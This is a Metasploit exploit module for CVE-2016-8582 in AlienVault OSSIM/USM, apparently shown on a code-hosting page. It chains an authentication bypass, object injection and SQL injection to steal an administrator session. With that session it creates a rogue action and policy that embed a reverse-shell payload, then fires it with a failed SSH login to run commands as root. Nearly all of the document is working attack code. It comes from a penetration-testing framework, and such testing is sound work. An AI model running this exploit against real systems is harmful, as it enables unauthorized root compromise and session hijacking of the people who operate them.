Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/linux/http/alienvault_exec.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::Remote::SSH1011def initialize(info={})12super(update_info(info,13'Name' => "AlienVault OSSIM/USM Remote Code Execution",14'Description' => %q{15This module exploits object injection, authentication bypass and ip spoofing vulnerabilities all together.16Unauthenticated users can execute arbitrary commands under the context of the root user.1718By abusing authentication bypass issue on gauge.php lead adversaries to exploit object injection vulnerability19which leads to SQL injection attack that leaks an administrator session token. Attackers can create a rogue20action and policy that enables to execute operating system commands by using captured session token. As a final step,21SSH login attempt with an invalid credentials can trigger a created rogue policy which triggers an action that executes22operating system command with root user privileges.2324This module was tested against following product and versions:25AlienVault USM 5.3.0, 5.2.5, 5.0.0, 4.15.11, 4.5.026AlienVault OSSIM 5.0.0, 4.6.127},28'License' => MSF_LICENSE,29'Author' =>30[31'Peter Lapp', # EDB advisory owner32'Mehmet Ince <[email protected]>' # Metasploit module33],34'References' =>35[36['CVE', '2016-8582'],37['URL', 'https://pentest.blog/unexpected-journey-into-the-alienvault-ossimusm-during-engagement/'],38['EDB', '40682']39],40'DefaultOptions' =>41{42'SSL' => true,43'WfsDelay' => 10,44'Payload' => 'python/meterpreter/reverse_tcp'45},46'Platform' => ['python'],47'Arch' => ARCH_PYTHON,48'Targets' =>49[50['Alienvault USM/OSSIM <= 5.3.0', {}]51],52'Privileged' => true,53'DisclosureDate' => '2017-01-31',54'DefaultTarget' => 055))5657register_options(58[59Opt::RPORT(443),60OptString.new('TARGETURI', [true, 'The URI of the vulnerable Alienvault OSSIM instance', '/'])61])62end636465def check66r = rand_text_alpha(15)67p = "a:1:{s:4:\"type\";s:69:\"1 AND extractvalue(rand(),concat(0x3a,(SELECT '#{r}')))-- \";}"6869res = send_request_cgi({70'method' => 'GET',71'uri' => normalize_uri(target_uri.path, 'ossim', 'dashboard', 'sections', 'widgets', 'data', 'gauge.php'),72'headers' => {73'User-Agent' => 'AV Report Scheduler',74},75'vars_get' => {76'type' => 'alarm',77'wtype' => 'foo',78'asset' => 'ALL_ASSETS',79'height' => 1,80'value' => p81}82})8384if res && res.code == 200 && res.body =~ /XPATH syntax error: ':#{r}'/85Exploit::CheckCode::Vulnerable86else87Exploit::CheckCode::Safe88end8990end919293def exploit94# Hijacking Administrator session by exploiting objection injection vuln that end up with sqli95print_status("Hijacking administrator session")9697sql = "SELECT id FROM sessions LIMIT 1"98p = "a:1:{s:4:\"type\";s:#{(sql.length + 58).to_s}:\"1 AND extractvalue(rand(),concat(0x3a3a3a,(#{sql}),0x3a3a3a))-- \";}"99100res = send_request_cgi({101'method' => 'GET',102'uri' => normalize_uri(target_uri.path, 'ossim', 'dashboard', 'sections', 'widgets', 'data', 'gauge.php'),103'headers' => {104'X-Forwarded-For' => rhost.to_s,105'User-Agent' => 'AV Report Scheduler',106},107'vars_get' => {108'type' => 'alarm',109'wtype' => 'foo',110'asset' => 'ALL_ASSETS',111'height' => 1,112'value' => p113}114})115if res && res.code == 200 && res.body =~ /XPATH syntax error: ':::(.*):::'/116admin_session = $1117cookie = "PHPSESSID=#{admin_session}"118print_good("Admin session token : #{cookie}")119else120fail_with(Failure::Unknown, "Session table is empty. Wait until someone logged in and try again")121end122123# Creating a Action that contains payload.124print_status("Creating rogue action")125r = rand_text_alpha(15)126127res = send_request_cgi({128'method' => 'POST',129'uri' => normalize_uri(target_uri.path, 'ossim', 'action', 'modifyactions.php'),130'cookie' => cookie,131'headers' => {132'X-Forwarded-For' => rhost.to_s,133},134'vars_post' => {135'id' => '',136'action' => 'new',137'old_name' => '',138'action_name' => r,139'ctx' => '',140'old_descr' => '',141'descr' => r,142'action_type' => '2',143'only' => 'on',144'cond' => 'True',145'email_from' => '',146'email_to' => 'email;email;email',147'email_subject' => '',148'email_message' => '',149'transferred_user' => '',150'transferred_entity' => '',151'exec_command' => "python -c \"#{payload.encoded}\""152}153})154155if res && res.code == 200 && res.body.include?("Action successfully updated")156print_good("Action created: #{r}")157else158fail_with(Failure::Unknown, "Unable to create action")159end160161# Retrieving the policy id. Authentication Bypass with User-Agent Doesn't work for this endpoint.162# Thus we're using hijacked administrator session.163print_status("Retrieving rogue action id")164165res = send_request_cgi({166'method' => 'GET',167'uri' => normalize_uri(target_uri.path, "ossim", "action", "getaction.php"),168'cookie' => cookie,169'headers' => {170'X-Forwarded-For' => rhost.to_s,171},172'vars_get' => {173'page' => '1',174'rp' => '2000'175}176})177178if res && res.code == 200 && res.body =~ /actionform\.php\?id=(.*)'>#{r}<\/a>/179action_id = $1180print_good("Corresponding Action ID found: #{action_id}")181else182fail_with(Failure::Unknown, "Unable to retrieve action id")183end184185# Retrieving the policy data. We will use it while creating policy186print_status("Retrieving policy ctx and group values")187188res = send_request_cgi({189'method' => 'GET',190'uri' => normalize_uri(target_uri.path.to_s, "ossim", "policy", "policy.php"),191'cookie' => cookie,192'headers' => {193'X-Forwarded-For' => rhost.to_s,194},195'vars_get' => {196'm_opt' => 'configuration',197'sm_opt' => 'threat_intelligence',198'h_opt' => 'policy'199}200})201202if res && res.code == 200 && res.body =~ /getpolicy\.php\?ctx=(.*)\&group=(.*)',/203policy_ctx = $1204policy_group = $2205print_good("CTX Value found: #{policy_ctx}")206print_good("GROUP Value found: #{policy_group}")207else208fail_with(Failure::Unknown, "Unable to retrieve policy data")209end210211# Creating policy that will be trigerred when SSH authentication failed due to wrong password.212print_status("Creating a policy that uses our rogue action")213policy = rand_text_alpha(15)214215res = send_request_cgi({216'method' => 'POST',217'uri' => normalize_uri(target_uri.path, "ossim", "policy", "newpolicy.php"),218'cookie' => cookie,219'headers' => {220'X-Forwarded-For' => rhost.to_s,221},222'vars_post' => {223'descr' => policy,224'active' => '1',225'group' => policy_group,226'ctx' => policy_ctx,227'order' => '1',228'action' => 'new',229'sources[]' => '00000000000000000000000000000000',230'dests[]' => '00000000000000000000000000000000',231'portsrc[]' => '0',232'portdst[]' => '0',233'plug_type' => '1',234'plugins[0]' => 'on',235'taxfilters[]' =>'25@2@0',236'tax_pt' => '0',237'tax_cat' => '0',238'tax_subc' => '0',239'mboxs[]' => '00000000000000000000000000000000',240'rep_act' => '0',241'rep_sev' => '1',242'rep_rel' => '1',243'rep_dir' => '0',244'ev_sev' => '1',245'ev_rel' => '1',246'tzone' => 'Europe/Istanbul',247'date_type' => '1',248'begin_hour' => '0',249'begin_minute' => '0',250'begin_day_week' => '1',251'begin_day_month' => '1',252'begin_month' => '1',253'end_hour' => '23',254'end_minute' => '59',255'end_day_week' => '7',256'end_day_month' => '31',257'end_month' => '12',258'actions[]' => action_id,259'sim' => '1',260'priority' => '1',261'qualify' => '1',262'correlate' => '0',263'cross_correlate' => '0',264'store' => '0'265}266})267268if res && res.code == 200269print_good("Policy created: #{policy}")270else271fail_with(Failure::Unknown, "Unable to create policy id")272end273274# We gotta reload all policies in order to make our rogue one enabled.275print_status("Activating the policy")276277res = send_request_cgi({278'method' => 'GET',279'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"),280'cookie' => cookie,281'headers' => {282'X-Forwarded-For' => rhost.to_s,283},284'vars_get' => {285'what' => 'policies',286'back' => '../policy/policy.php'287}288})289290if res && res.code == 200291print_good("Rogue policy activated")292else293fail_with(Failure::Unknown, "#{peer} - Unable to enable rogue policy")294end295296# We will trigger the rogue policy by doing ssh auth attempt with invalid credential :-)297opts = ssh_client_defaults.merge({298auth_methods: ['password'],299port: 22,300password: rand_text_alpha(15)301})302303print_status("Triggering the policy by performing SSH login attempt")304305begin306Net::SSH.start(rhost, "root", opts)307rescue Net::SSH::AuthenticationFailed308print_good("SSH - Failed authentication. That means our policy and action will be trigged..!")309rescue Net::SSH::Exception => e310print_error("SSH Error: #{e.class} : #{e.message}")311return nil312end313314end315end316317318